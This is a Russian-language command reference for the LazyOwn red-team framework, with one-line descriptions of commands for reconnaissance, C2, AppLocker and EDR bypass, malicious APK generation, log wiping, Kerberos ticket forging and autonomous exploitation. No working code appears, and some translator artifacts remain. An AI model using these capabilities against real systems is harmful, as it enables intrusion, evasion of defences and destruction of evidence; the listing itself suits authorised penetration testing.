Фаза: отчёт | Источник: cli/commands/report_migrated.py

Интерактивный преобразователь кода Морзе.

name_the_hash

Фаза: отчёт | Источник: cli/commands/report_migrated.py

Определяет тип хеша с помощью nth после получения его через get_hash().

nmapscripthelp

Фаза: отчёт | Источник: cli/commands/report_migrated.py

Помогает найти и отобразить информацию о скриптах Nmap.

process_scans

Фаза: отчёт | Источник: cli/commands/report_migrated.py

Обрабатывает CSV-файлы с результатами сканирования и данными об уязвимостях для создания базы данных в формате, подобном Shodan.

pth_net

Фаза: отчёт | Источник: cli/commands/report_migrated.py

Выполняет инструмент Pass-the-Hash (PTH) Net для смены пароля учётной записи Active Directory.

pup

Фаза: отчёт | Источник: cli/commands/report_migrated.py

Обрабатывает HTML-содержимое указанного URL с помощью утилиты pup и стандартного CSS-селектора.

vulns

Фаза: отчёт | Источник: cli/commands/report.py

Отображение или управление уязвимостями.

12. Разное

EOF

Фаза: разное | Источник: cli/commands/misc_migrated.py

Обрабатывает условие конца файла (EOF).

acknowledgearp

Фаза: разное | Источник: cli/commands/misc_migrated.py

Настраивает систему на подтверждение ARP-запросов путём установки параметра ядра.

acknowledgeicmp

Фаза: разное | Источник: cli/commands/misc_migrated.py

Настраивает систему на ответ на ICMP echo-запросы путём установки параметра ядра.

addalias

Фаза: разное | Источник: cli/commands/misc_migrated.py

Добавляет новый алиас с поддержкой плейсхолдеров, таких как {rhost}, {lhost}, {lport} и т.д.

addhosts

Фаза: разное | Источник: cli/commands/misc_migrated.py

Добавляет запись в файл /etc/hosts, сопоставляя IP-адрес с доменным именем.

aliass

Фаза: разное | Источник: cli/commands/misc_migrated.py

Выводит все настроенные алиасы и связанные с ними команды.

assign

Фаза: разное | Источник: cli/commands/misc_migrated.py

Присваивает значение параметру, сохраняет его в payload.json и обновляет алиасы.

back

Фаза: разное | Источник: cli/commands/module_manager.py

Покидает контекст текущего модуля.

banner

Фаза: разное | Источник: cli/commands/misc_migrated.py

Показать баннер.

base64decode

Фаза: разное | Источник: cli/commands/misc_migrated.py

Декодирует строку, закодированную в Base64.

base64encode

Фаза: разное | Источник: cli/commands/misc_migrated.py

Кодирует заданную строку в формат Base64.

browse

Фаза: разное | Источник: cli/commands/misc_migrated.py

Открыть TUI-браузер sessions/.

campaign

Фаза: разное | Источник: cli/commands/campaign.py

Экспорт или импорт всей кампании в виде переносимого пакета.

catalog

Фаза: разное | Источник: cli/commands/catalog.py

Просмотр каталога команд.

chainmode

Фаза: разное | Источник: cli/commands/misc_migrated.py

Переключение интерактивного режима цепочки kill-chain после каждой команды.

check_update

Фаза: разное | Источник: cli/commands/misc_migrated.py

Проверяет наличие обновлений, сравнивая локальную версию с удалённой.

clean

Фаза: разное | Источник: cli/commands/misc_migrated.py

Удаляет файлы и каталоги в директории sessions, исключая указанные файлы и каталоги.

clock

Фаза: разное | Источник: cli/commands/misc_migrated.py

Отображает текущие дату и время, а также выполняет пользовательский shell-скрипт.

clone_site

Фаза: разное | Источник: cli/commands/misc_migrated.py

Клонирует веб-сайт и размещает файлы в sessions/{url_cloned}.

collab_join

Фаза: разное | Источник: cli/commands/misc_migrated.py

Выводит URL для присоединения к совместной работе нескольких операторов и SSE-конечную точку.

config_banner

Фаза: разное | Источник: cli/commands/misc_migrated.py

Настраивает баннер конфигурации. Откройте мастер в стиле Powerlevel10k для переключения сегментов приглашения.

cred_mark_failed

Фаза: разное | Источник: cli/commands/automation.py

Пометить учётные данные как неудачные для хоста.

cred_reuse

Фаза: разное | Источник: cli/commands/automation.py

Проанализировать захваченные учётные данные и предложить цели для распыления (spray).

cron

Фаза: разное | Источник: cli/commands/misc_migrated.py

Планирует выполнение команды в указанное время.

ctx

Фаза: разное | Источник: cli/commands/misc_migrated.py

Вывести однострочный контекст оператора: rhost, lhost, domain, phase, os, creds.

daemon_approve

Фаза: разное | Источник: cli/commands/misc_migrated.py

Одобрить или отклонить текущее ожидающее действие демона.

daemon_focus

Фаза: разное | Источник: cli/commands/misc_migrated.py

Ограничить автономный демон набором целевых объектов.

daemon_mode

Фаза: разное | Источник: cli/commands/misc_migrated.py

Переключить автономный демон между режимами auto, approval и paused.

daemon_pause

Фаза: разное | Источник: cli/commands/misc_migrated.py

Приостановить автономный демон перед следующим шагом.

daemon_resume

Фаза: разное | Источник: cli/commands/misc_migrated.py

Возобновить работу автономного демона (переключить режим на auto).

daemon_veto

Фаза: разное | Источник: cli/commands/misc_migrated.py

Добавить или очистить запрещённые первые токены команд для автономного демона.

dashboard

Фаза: разное | Источник: cli/commands/misc_migrated.py

Запустить полноэкранную панель оператора LazyOwn (Textual TUI).

db_creds

Фаза: разное | Источник: cli/commands/database.py

Список или добавление учётных данных.

db_export

Фаза: разное | Источник: cli/commands/database.py

Экспорт таблицы базы данных в CSV.

db_hosts

Фаза: разное | Источник: cli/commands/database.py

Список или добавление хостов в активной рабочей области.

db_import

Фаза: разное | Источник: cli/commands/database.py

Импорт результатов сканирования в базу данных.

db_init

Фаза: разное | Источник: cli/commands/database.py

Инициализация базы данных (создаёт схему, если она не существует).

db_loot

Фаза: разное | Источник: cli/commands/database.py

Список или добавление элементов добычи (loot).

db_notes

Фаза: разное | Источник: cli/commands/database.py

Список или добавление заметок.

db_services

Фаза: разное | Источник: cli/commands/database.py

Список всех сервисов в активной рабочей области.

db_status

Фаза: разное | Источник: cli/commands/database.py

Показать количество сущностей для активной рабочей области.

db_vulns

Фаза: разное | Источник: cli/commands/database.py

Список или добавление уязвимостей.

db_workspace

Фаза: разное | Источник: cli/commands/database.py

Управление рабочими областями (список, создание, переключение, удаление).

decode

Фаза: разное | Источник: cli/commands/misc_migrated.py

Декодировать строку, используя указанное значение сдвига и ключ подстановки.

doctor

Фаза: разное | Источник: cli/commands/misc_migrated.py

Предварительная проверка работоспособности окружения — убедиться, что установка готова.

download_resources

Фаза: разное | Источник: cli/commands/misc_migrated.py

Загружает ресурсы в каталог sessions.

encode

Фаза: разное | Источник: cli/commands/misc_migrated.py

Кодирует строку, используя указанное значение сдвига и ключ подстановки.

encoderpayload

Фаза: разное | Источник: cli/commands/misc_migrated.py

Применяет различные обфускации к заданной строке командной строки для создания нескольких обфусцированных версий.

encodewinbase64

Фаза: разное | Источник: cli/commands/misc_migrated.py

Кодирует заданную полезную нагрузку в строку Base64, подходящую для выполнения в Windows PowerShell.

engage

Фаза: разное | Источник: cli/commands/misc_migrated.py

Провести одну цель через полную цепочку атак одной командой.

exit

Фаза: разное | Источник: cli/commands/misc_migrated.py

Выход из интерфейса командной строки.

explore

Фаза: разное | Источник: cli/commands/misc_migrated.py

Показать покрытие исследования и предложения по аддонам/инструментам для каждого сервиса.

fixel

Фаза: разное | Источник: cli/commands/misc_migrated.py

Исправляет права доступа к файлам и окончания строк в каталогах проекта.

fixperm

Фаза: разное | Источник: cli/commands/misc_migrated.py

Исправить права доступа для shell-скриптов LazyOwn.

gencert

Фаза: misc | Источник: cli/commands/misc_migrated.py

Генерирует центр сертификации (CA), клиентский сертификат и клиентский ключ.

generate

Фаза: misc | Источник: cli/commands/payload_generation.py

Сгенерировать полезную нагрузку (payload).

getseclist

Фаза: misc | Источник: cli/commands/misc_migrated.py

Получить словарь SecLists с GitHub.

god_nodes

Фаза: misc | Источник: cli/commands/misc_migrated.py

Показать наиболее связанные узлы («божественные узлы») из графа.

graph

Фаза: misc | Источник: cli/commands/misc_migrated.py

Генерирует граф из JSON-файлов полезной нагрузки, содержащих URL, RHOST и RPORT.

graph_overlay

Фаза: misc | Источник: cli/commands/misc_migrated.py

Открыть наложение графа поверх графа знаний graphify.

graph_search

Фаза: misc | Источник: cli/commands/misc_migrated.py

Нечёткий поиск узлов по метке в графе знаний graphify.

gym

Фаза: misc | Источник: cli/commands/redteam_gym.py

Red Team Gym — игровое обучение пентесту с рейтингом ELO.

h

Фаза: misc | Источник: cli/commands/misc_migrated.py

Открыть новое окно в сессии tmux с использованием LazyOwn RedTeam Framework.

hex_to_plaintext

Фаза: misc | Источник: cli/commands/misc_migrated.py

Преобразует шестнадцатеричные данные из файла в обычный текст.

hooks

Фаза: misc | Источник: cli/commands/automation.py

Управление условными хуками — список, включение, отключение, добавление, удаление правил.

hooks_add

Фаза: misc | Источник: cli/commands/automation.py

Добавить новое правило условного хука (JSON-строка).

hooks_enable

Фаза: misc | Источник: cli/commands/automation.py

Включить или отключить правило хука.

hooks_fire

Фаза: misc | Источник: cli/commands/automation.py

Вручную запустить событие хука для тестирования.

hooks_list

Фаза: misc | Источник: cli/commands/automation.py

Перечислить все правила условных хуков.

hooks_remove

Фаза: misc | Источник: cli/commands/automation.py

Удалить правило хука по имени.

hunt

Фаза: misc | Источник: cli/commands/misc_migrated.py

Запустить автономную цепочку эксплуатации против цели.

ignorearp

Фаза: misc | Источник: cli/commands/misc_migrated.py

Настраивает систему игнорировать ARP-запросы путём установки параметра ядра.

ignoreicmp

Фаза: misc | Источник: cli/commands/misc_migrated.py

Настраивает систему игнорировать ICMP-запросы эхо-ответа путём установки параметра ядра.

ip

Фаза: misc | Источник: cli/commands/misc_migrated.py

Отображает IP-адреса сетевых интерфейсов и копирует IP-адрес из интерфейса tun0 в буфер обмена.

ip2asn

Фаза: misc | Источник: cli/commands/misc_migrated.py

Команда для получения ASN для заданного IP-адреса.

ip2hex

Фаза: misc | Источник: cli/commands/misc_migrated.py

Преобразовать IPv4-адрес в его шестнадцатеричное представление.

ipp

Фаза: misc | Источник: cli/commands/misc_migrated.py

Отображает IP-адреса сетевых интерфейсов и выводит IP-адрес из интерфейса tun0.

karma

Фаза: misc | Источник: cli/commands/misc_migrated.py

Показать рейтинг ELO, уровень кармы и прогресс исследования для этого оператора.

kick

Фаза: misc | Источник: cli/commands/misc_migrated.py

Обрабатывает процесс отправки поддельного ARP-пакета на указанный IP-адрес с заданным MAC-адресом.

killchain

Фаза: misc | Источник: cli/commands/misc_migrated.py

Показать общий прогресс цепочки атаки (kill-chain) и управлять автообновлением.

l00t

Фаза: misc | Источник: cli/commands/misc_migrated.py

Единая добыча: показать, искать, повторно использовать, строить граф и помечать учётные данные.

lab

Фаза: misc | Источник: cli/commands/lab.py

Управлять локальными лабораториями для практики CTF.

lazyscript

Фаза: misc | Источник: cli/commands/misc_migrated.py

Выполняет команды, определённые в файле lazyscript.

links

Фаза: misc | Источник: cli/commands/misc_migrated.py

Отображает список полезных ссылок и позволяет пользователю выбрать и скопировать ссылку в буфер обмена.

list

Фаза: misc | Источник: cli/commands/misc_migrated.py

Перечисляет все доступные скрипты в каталоге модулей.

listaliases

Фаза: misc | Источник: cli/commands/misc_migrated.py

Перечислить все доступные алиасы.

load_session

Phase: misc | Source: cli/commands/misc_migrated.py

Загрузить сессию из файла sessionLazyOwn.json и отобразить состояние различных параметров.

lock_target

Phase: misc | Source: cli/commands/collaboration.py

Получить рекомендательную блокировку на цель, чтобы предотвратить конфликты инструментов.

login

Phase: misc | Source: cli/commands/cli_auth.py

Аутентификация через users.json (те же пользователи, что и в lazyc2.py).

logout

Phase: misc | Source: cli/commands/cli_auth.py

Выйти из системы текущего оператора CLI и очистить токен запоминания.

lolbas_list

Phase: misc | Source: cli/commands/pwn.py

Перечислить доступные техники LOLBAS (Living Off The Land) из плагинов.

loot

Phase: misc | Source: cli/commands/misc_migrated.py

Псевдоним для l00t — унифицированная добыча (показать/искать/использовать/граф/отметить).

makerc

Phase: misc | Source: cli/commands/resource_scripting.py

Записать команды сеанса в ресурсный скрипт.

marketplace

Phase: misc | Source: cli/commands/marketplace.py

Найти и установить плагины, дополнения и инструменты сообщества.

marketplace_config

Phase: misc | Source: cli/commands/marketplace.py

Интерактивный менеджер маркетплейса (curses TUI).

mkrc

Phase: misc | Source: cli/commands/resource_scripting.py

Псевдоним для makerc — записать команды в скрипт.

msfshellcoder

Phase: misc | Source: cli/commands/misc_migrated.py

Сгенерировать шеллкод в формате C с помощью msfvenom для пользовательской команды или полезной нагрузки reverse shell.

nano

Phase: misc | Source: cli/commands/misc_migrated.py

Открыть или создать файл с помощью строки в каталоге сессий для редактирования в nano.

neighbors

Phase: misc | Source: cli/commands/misc_migrated.py

Показать соседей узла или команды из графа graphify.

news

Phase: misc | Source: cli/commands/misc_migrated.py

Показать Hacker News в терминале.

next

Phase: misc | Source: cli/commands/misc_migrated.py

Показать рекомендации по следующим шагам или выполнить активную авто-подсказку.

note

Phase: misc | Source: cli/commands/misc_migrated.py

Захватить быструю заметку оператора, привязанную к текущей цели и фазе.

notify

Phase: misc | Source: cli/commands/misc_migrated.py

Команда для запуска уведомления в стиле toastr.

op_create

Phase: misc | Source: cli/commands/caldera.py

Создать новую запланированную операцию.

op_list

Phase: misc | Source: cli/commands/caldera.py

Перечислить все операции.

op_pause

Phase: misc | Source: cli/commands/caldera.py

Приостановить выполняющуюся операцию.

op_plan

Phase: misc | Source: cli/commands/caldera.py

Заполнить шаги операции из playbook YAML или через MITRE derive.

op_report

Phase: misc | Source: cli/commands/caldera.py

Сгенерировать полный отчёт по операции.

op_resume

Phase: misc | Source: cli/commands/caldera.py

Возобновить приостановленную операцию.

op_start

Phase: misc | Source: cli/commands/caldera.py

Запустить (или возобновить) операцию.

op_status

Phase: misc | Source: cli/commands/caldera.py

Показать статус операции.

op_stop

Phase: misc | Source: cli/commands/caldera.py

Остановить выполняющуюся операцию.

op_timeline

Phase: misc | Source: cli/commands/caldera.py

Показать временную шкалу событий операции.

operator_create

Phase: misc | Source: cli/commands/automation.py

Создать новый профиль оператора.

operator_delete

Phase: misc | Source: cli/commands/automation.py

Удалить профиль оператора.

operator_load

Phase: misc | Source: cli/commands/automation.py

Загрузить эффективную конфигурацию для оператора (базовая линия команды + переопределения).

operators

Phase: misc | Source: cli/commands/automation.py

Перечислить все профили операторов.

palette

Phase: misc | Source: cli/commands/misc_migrated.py

Просмотреть каталог команд оператора, сгруппированных по фазе цепочки убийства.

palette_k

Phase: misc | Source: cli/commands/misc_migrated.py

Открыть нечёткую накладную палитру команд Command-K.

payload

Phase: misc | Source: cli/commands/misc_migrated.py

Загрузить параметры из указанного файла payload JSON.

phase

Phase: misc | Source: cli/commands/misc_migrated.py Получить или установить текущую фазу килл-чейна.

pipeline

Фаза: misc | Источник: cli/commands/misc_migrated.py

Декларативный слой композиции: запуск YAML-конвейера команд LazyOwn.

pivot

Фаза: misc | Источник: cli/commands/misc_migrated.py

Записать новую обнаруженную цель для перехода или показать цепочку переходов.

plan

Фаза: misc | Источник: cli/commands/caldera.py

Выбрать следующую наилучшую технику для выполнения для цели.

plan_apply

Фаза: misc | Источник: cli/commands/caldera.py

Запустить планировщик, затем автоматически создать и запустить операцию.

plan_detail

Фаза: misc | Источник: cli/commands/caldera.py

Показать полный ранжированный план (все кандидаты) для цели.

pop

Фаза: misc | Источник: cli/commands/misc_migrated.py

Открыть центрированное всплывающее окно в текущей tmux-сессии для выполнения shell-команды.

prev

Фаза: misc | Источник: cli/commands/misc_migrated.py

Показать предварительные команды для глагола (стрелка prev в цепочке).

pwd

Фаза: misc | Источник: cli/commands/misc_migrated.py

Отображает текущую рабочую директорию и список файлов, а также копирует путь текущей директории в буфер обмена.

qa

Фаза: misc | Источник: cli/commands/misc_migrated.py

Быстро выйти из приложения без подтверждения.

recommend_next

Фаза: misc | Источник: cli/commands/misc_migrated.py

Рекомендовать следующее действие через единый механизм рекомендаций.

register

Фаза: misc | Источник: cli/commands/cli_auth.py

Зарегистрировать новую учётную запись оператора в users.json.

resource

Фаза: misc | Источник: cli/commands/resource_scripting.py

Запустить расширенный ресурсный скрипт.

rhost

Фаза: misc | Источник: cli/commands/misc_migrated.py

Копирует удалённый хост (self.params['rhost']) в буфер обмена и обновляет приглашение командной строки.

rich_tui

Фаза: misc | Источник: cli/commands/pwn.py

Запустить интерактивный TUI-дашборд на основе Rich.

rot

Фаза: misc | Источник: cli/commands/misc_migrated.py

Применить шифр подстановки ROT (вращение) к заданной строке.

rotf

Фаза: misc | Источник: cli/commands/misc_migrated.py

Применить шифр подстановки ROT (вращение) к заданному расширению.

rrhost

Фаза: misc | Источник: cli/commands/misc_migrated.py

Обновляет приглашение командной строки, чтобы включить удалённый хост (self.params['rhost']) и текущую рабочую директорию.

run

Фаза: misc | Источник: cli/commands/misc_migrated.py

Запускает конкретный скрипт LazyOwn или активный модуль.

scans

Фаза: misc | Источник: cli/commands/misc_migrated.py

Список файлов сканирования nmap в sessions/ с возрастом, размером и открытыми портами.

scope

Фаза: misc | Источник: cli/commands/misc_migrated.py

Управление авторизованной областью взаимодействия и режимом защиты области.

search

Фаза: misc | Источник: cli/commands/module_manager.py

Поиск модулей по имени, описанию или автору.

sh

Фаза: misc | Источник: cli/commands/misc_migrated.py

Выполняет shell-команду непосредственно из интерфейса LazyOwn.

share_finding

Фаза: misc | Источник: cli/commands/collboration.py (в оригинале collaboration.py, но в тексте опечатка? Проверю: в исходнике было cli/commands/collaboration.py — да, в тексте collaboration.py. Оставляю как есть.)

Поделиться находкой или обнаруженными учётными данными с командой.

show

Фаза: misc | Источник: cli/commands/misc_migrated.py

Показать параметры, модули, полезные нагрузки или параметры активного модуля.

sitrep

Фаза: misc | Источник: cli/commands/misc_migrated.py

Вывести единую сводку оперативной обстановки.

spool

Фаза: misc | Источник: cli/commands/resource_scripting.py

Записать вывод сесии в файл.

stealth_off

Фаза: misc | Источник: cli/commands/pwn.py

Отключить режим сктности.

suggest_next

Фаза: misc | Источник: cli/commands/misc_migrated.py

Предложить следующие команды, обходя граф от недавней активности.

sys

Фза: misc | Источник: cli/commands/misc_migrated.py

Выполняет shell-команду непосредственно из интерфейса LazyOwn.

tab

Фаза: misc | Источник: cli/commands/misc_migrated.py

Выполняет скрипт lazypyautogui.py с необязательными аргументами.

tasks

Фаза: misc | Источник: cli/commands/misc_migrated.py

Просмотр и управление очередью задач из sessions/tasks.json.

team_chat

Фаза: misc | Источник: cli/commands/collaboration.py

Отправить сообщение всем подключённым операторам.

team_status

Фза: misc | Источник: cli/commands/collaboration.py

Показать статус всех членов команды. Phase: misc | Source: cli/commands/collaboration.py

Показать активных операторов и целевые блокировки.

tenant

Phase: misc | Source: cli/commands/misc_migrated.py

Управление мультиарендностью: список, переключение или создание арендаторов для вовлечений.

tgrep

Phase: misc | Source: cli/commands/misc_migrated.py

Поиск по всем предыдущим выводам команд и журналам сессий.

timeline_browser

Phase: misc | Source: cli/commands/misc_migrated.py

Открыть таймлайн-скраббер по CSV-отчёту сессии.

toast_clear

Phase: misc | Source: cli/commands/misc_migrated.py

Пометить все ожидающие toast-события как просмотренные без их вывода.

ttp_matrix

Phase: misc | Source: cli/commands/caldera.py

Отобразить матрицу покрытия MITRE ATT&CK по всем операциям.

ttp_rebuild

Phase: misc | Source: cli/commands/caldera.py

Повторно пройти по каталогу операций для обновления матрицы покрытия.

ttp_show

Phase: misc | Source: cli/commands/caldera.py

Показать детали по одной технике MITRE.

tui_theme

Phase: misc | Source: cli/commands/misc_migrated.py

Переключить цветовую тему TUI, используемую в заставке и стилизованном выводе.

unlock_target

Phase: misc | Source: cli/commands/collaboration.py

Снять рекомендательную блокировку с цели.

urldecode

Phase: misc | Source: cli/commands/misc_migrated.py

Декодировать URL-закодированную строку.

urlencode

Phase: misc | Source: cli/commands/misc_migrated.py

Закодировать строку для URL.

use

Phase: misc | Source: cli/commands/module_manager.py

Выбрать модуль для работы.

v

Phase: misc | Source: cli/commands/misc_migrated.py

Открыть новое окно в tmux-сессии с использованием LazyOwn RedTeam Framework.

whoami

Phase: misc | Source: cli/commands/cli_auth.py

Показать текущего авторизованного оператора CLI.

wizard

Phase: misc | Source: cli/commands/misc_migrated.py

Интерактивный мастер первичной настройки — настройка rhost, lhost, домена, словарей и другого.

13. Диагностика

lazy_payload_keys

Phase: diagnostics | Source: cli/commands/diagnostics.py

Список ключей, присутствующих в полезной нагрузке родительской оболочки.

lazy_runtime

Phase: diagnostics | Source: cli/commands/diagnostics.py

Вывести интерпретатор, платформу и основные пути LazyOwn.

Без категории

GET

Phase: uncategorized | Source: cli/commands/phishing_wizard.py

Описание недоступно.

OPTIONS

Phase: uncategorized | Source: cli/commands/phishing_wizard.py

Описание недоступно.

POST

Phase: uncategorized | Source: cli/commands/phishing_wizard.py

Описание недоступно.

adcs_esc

Phase: uncategorized | Source: cli/commands/active_directory.py

Проверить службы сертификатов Active Directory на уязвимости ESC1-ESC13.

ai_playbook

Phase: uncategorized | Source: cli/commands/ai.py

Сгенерировать наступательный плейбук из Nmap CSV + KB + Ollama.

ai_toggle

Phase: uncategorized | Source: cli/commands/ai.py

Включить или выключить встроенного ИИ-ассистента.

android_apk

Phase: uncategorized | Source: cli/commands/mobile_macos.py

Сгенерировать вредоносный APK с полезной нагрузкой reverse shell.

android_enum

Phase: uncategorized | Source: cli/commands/mobile_macos.py

Перечислить Android-устройство, подключённое через ADB.

applocker_csc

Phase: uncategorized | Source: cli/commands/applocker_bypass.py

Сгенерировать обход AppLocker через компиляцию и выполнение csc.exe.

applocker_installutil

Phase: uncategorized | Source: cli/commands/applocker_bypass.py

Сгенерировать полезную нагрузку для обхода AppLocker через InstallUtil.exe.

applocker_msbuild

Phase: uncategorized | Source: cli/commands/applocker_bypass.py

Сгенерировать полезную нагрузку для обхода AppLocker через MSBuild.exe.

applocker_mshta

Phase: uncategorized | Source: cli/commands/applocker_bypass.py

Сгенерировать полезную нагрузку для обхода AppLocker через mshta.exe.

applocker_presentation

Phase: uncategorized | Source: cli/commands/applocker_bypass.py

Сгенерировать ссылку для обхода AppLocker через PresentationHost.exe.

applocker_regsvcs

Phase: uncategorized | Source: cli/commands/applocker_bypass.py

Сгенерировать полезную нагрузку для обхода AppLocker через Regsvcs.exe/Regasm.exe.

applocker_rundll32

Phase: uncategorized | Source: cli/commands/applocker_bypass.py

Сгенерировать обход AppLocker через rundll32.exe с помощью SCT-скриптлета.

arsenal_show

Phase: uncategorized | Source: cli/commands/payload_arsenal.py

Показать элементы арсенала полезных нагрузок.

ask

Phase: uncategorized | Source: cli/commands/ai.py

Задать вопрос ИИ с предварительно загруженным контекстом текущей сессии.

attack_surface

Phase: uncategorized | Source: cli/commands/reporting.py

Сформировать сводку поверхности атаки на основе данных разведки.

audit_complete_keys

Phase: uncategorized | Source: cli/commands/audit.py

Вывести подсказки автодополнения с учётом полезных нагрузок для частичной команды.

auditd_disable

Phase: uncategorized | Source: cli/commands/opsec_cleanup.py

Сгенерировать команды для отключения Linux auditd.

auto_loop

Phase: uncategorized | Source: cli/commands/mcp_bridge.py

Запустить цель через автономный оркестратор в фоновом режиме.

auto_populate

Phase: uncategorized | Source: cli/commands/mcp_bridge.py

Разобрать последний XML-скан nmap и автоматически заполнить контекст полезных нагрузок.

autopivot

Phase: uncategorized | Source: cli/commands/pivoting.py

Автоматически обнаружить внутренние сети и настроить туннели для pivoting.

aws_privesc

Phase: uncategorized | Source: cli/commands/cloud_attacks.py

Повышение привилегий и перечисление в AWS.

bof_catalog

Phase: uncategorized | Source: cli/commands/bof_registry.py

Перечислить все BOF, доступные в курируемом каталоге.

bof_info

Phase: uncategorized | Source: cli/commands/bof_registry.py

Показать подробную информацию о BOF.

bof_install

Phase: uncategorized | Source: cli/commands/bof_registry.py

Установить и скомпилировать BOF, подготовив его для доставки через beacon.

bof_list

Phase: uncategorized | Source: cli/commands/bof_registry.py

Перечислить все установленные и подготовленные BOF.

bof_run

Phase: uncategorized | Source: cli/commands/bof_registry.py

Выполнить BOF на подключённом beacon.

bof_search

Phase: uncategorized | Source: cli/commands/bof_registry.py

Поиск BOF в каталоге по ключевому слову.

bof_uninstall

Phase: uncategorized | Source: cli/commands/bof_registry.py

Удалить BOF и убрать его подготовленный файл.

c2_dns

Phase: uncategorized | Source: cli/commands/c2_profile.py

Настроить или отобразить DNS-профиль beacon.

c2_profiles

Phase: uncategorized | Source: cli/commands/c2_profile.py

Перечислить все доступные транспортные профили C2.

c2_rotate

Phase: uncategorized | Source: cli/commands/c2_profile.py

Переключиться на следующий транспортный профиль C2 в очереди ротации.

c2_tls

Phase: uncategorized | Source: cli/commands/c2_profile.py

Отобразить текущий TLS-профиль C2.

campaign_sitrep

Phase: uncategorized | Source: cli/commands/mcp_bridge.py

Псевдоним sitrep, сохранённый для согласованности с MCP-глаголами (lazyown_campaign_sitrep).

cicd_scan

Phase: uncategorized | Source: cli/commands/cicd.py

Сканировать CI/CD-платформу на предмет ошибок безопасности.

cicd_secrets

Phase: uncategorized | Source: cli/commands/cicd.py

Сканировать журнал сборки на предмет утёкших секретов.

clean_ad

Phase: uncategorized | Source: cli/commands/anti_forensics.py

Очистить журналы событий Active Directory и кэшированные билеты Kerberos.

cloud_buckets

Phase: uncategorized | Source: cli/commands/cloud.py

Перечислить облачные хранилища для заданного префикса.

cloud_enum

Phase: uncategorized | Source: cli/commands/cloud.py

Перечислить метаданные облачного провайдера, хранилища и IAM.

cloud_iam

Phase: uncategorized | Source: cli/commands/cloud.py

Перечислить роли и политики IAM в облаке.

cloud_metadata

Phase: uncategorized | Source: cli/commands/cloud.py

Собрать метаданные облачного инстанса (AWS IMDS, Azure, GCP).

cloud_scan

Phase: uncategorized | Source: cli/commands/cloud.py

Полное сканирование облачной безопасности: метаданные + хранилища + перечисление IAM.

container_detect

Phase: uncategorized | Source: cli/commands/containers.py

Автоматически определить среду выполнения контейнера и примитивы для побега.

container_escape

Phase: uncategorized | Source: cli/commands/containers.py

Проверить текущий контейнер на известные векторы побега.

cover_tracks

Фаза: без категории | Источник: cli/commands/anti_forensics.py

Выполнить все операции анти-форензики последовательно.

crack_hashes

Фаза: без категории | Источник: cli/commands/security.py

Взломать хэши паролей из файла с помощью John the Ripper или Hashcat.

cross_cloud

Фаза: без категории | Источник: cli/commands/cloud_attacks.py

Атаки на федерацию удостоверений между облаками.

dacl_abuse

Фаза: без категории | Источник: cli/commands/active_directory.py

Перечислить и использовать опасные записи DACL/SACL в Active Directory.

delegation_attack

Фаза: без категории | Источник: cli/commands/active_directory.py

Показать вычисленные пути атак через делегирование с командами эксплуатации.

delegation_enum

Фаза: без категории | Источник: cli/commands/active_directory.py

Перечислить конфигурации делегирования Kerberos.

depconfuse

Фаза: без категории | Источник: cli/commands/supply_chain.py

Сканировать requirements.txt на предмет кандидатов для путаницы зависимостей.

depscan

Фаза: без категории | Источник: cli/commands/supply_chain.py

Сканировать дерево каталогов на файлы зависимостей и отмечать риски.

detect_edr

Фаза: без категории | Источник: cli/commands/evasive_payload.py

Сгенерировать команды для обнаружения EDR/AV на цели.

docker_enum

Фаза: без категории | Источник: cli/commands/containers.py

Перечислить Docker-хост: контейнеры, образы, привилегии, монтирования.

dotnet_payload

Фаза: без категории | Источник: cli/commands/payload_arsenal.py

Сгенерировать полезную нагрузку .NET/C#.

edr_detect

Фаза: без категории | Источник: cli/commands/edr_detect.py

Обнаружить продукты EDR/AV на цели.

edr_profile

Фаза: без категории | Источник: cli/commands/edr_detect.py

Сгенерировать профиль обхода на основе обнаруженного EDR.

edr_script

Фаза: без категории | Источник: cli/commands/edr_detect.py

Сгенерировать PowerShell-скрипт для обнаружения EDR.

entra_attack

Фаза: без категории | Источник: cli/commands/cloud_attacks.py

Атаки на Microsoft Entra ID / Azure AD.

evasion

Фаза: без категории | Источник: cli/commands/evasive_payload.py

Сгенерировать и управлять профилями обхода C2.

evasive

Фаза: без категории | Источник: cli/commands/evasive_payload.py

Сгенерировать полезные нагрузки, обходящие обнаружение, с несколькими стратегиями обфускации.

evasive_payload

Фаза: без категории | Источник: cli/commands/evasive_payload.py

Сгенерировать обходную полезную нагрузку с автоматическим обходом AV/EDR.

event_log

Фаза: без категории | Источник: lazyown.py

Показать недавние события EventBus. Использование: event_log [N] [category]

facts_show

Фаза: без категории | Источник: cli/commands/mcp_bridge.py

Показать структурированные факты, извлеченные из сканирования nmap и вывода инструментов.

forensic_clean

Фаза: без категории | Источник: cli/commands/opsec_cleanup.py

Очистить артефакты форензики — Prefetch, Shimcache, Amcache, Jump Lists и т.д.

form

Фаза: без категории | Источник: cli/commands/audit.py

Открыть интерактивную форму для известной команды. Использование: form .

fz

Фаза: без категории | Источник: cli/commands/audit.py

Нечеткий поиск команд. Использование: fz [query]. Пустой список выводит все команды.

gcp_privesc

Фаза: без категории | Источник: cli/commands/cloud_attacks.py

Повышение привилегий и перечисление в GCP.

gitlab_enum

Фаза: без категории | Источник: cli/commands/cicd.py

Перечислить экземпляр GitLab.

gpo_abuse

Фаза: без категории | Источник: cli/commands/active_directory.py

Перечислить и использовать объекты групповой политики.

grep_log

Фаза: без категории | Источник: cli/commands/audit.py

Поиск по последним выводам команд. Использование: grep_log [--cmd ].

groq

Фаза: без категории | Источник: cli/commands/ai.py

Отправить запрос в API Groq, используя настроенный api_key.

jenkins_enum

Фаза: без категории | Источник: cli/commands/cicd.py

Перечислить экземпляр Jenkins.

k8s_attack

Фаза: без категории | Источник: cli/commands/cloud_attacks.py

Атака на Kubernetes — перечисление RBAC, побег из пода, etcd, постоянство.

k8s_enum

Фаза: без категории | Источник: cli/commands/containers.py

Перечислить кластер Kubernetes: поды, секреты, SA, RBAC.

k8s_pods

Фаза: без категории | Источник: cli/commands/containers.py

Перечислить кластер Kubernetes: поды, секреты, SA, RBAC. Перечислить поды Kubernetes с деталями, важными для безопасности.

k8s_secrets

Фаза: не классифицировано | Источник: cli/commands/containers.py

Перечислить и декодировать секреты Kubernetes.

kerberoast

Фаза: не классифицировано | Источник: cli/commands/active_directory.py

Продвинутый Kerberoasting — режим только AES, целевой перебор SPN.

kerberos_ticket

Фаза: не классифицировано | Источник: cli/commands/active_directory.py

Создавать билеты Kerberos для закрепления и горизонтального перемещения.

linux_advanced_payload

Фаза: не классифицировано | Источник: cli/commands/payload_arsenal.py

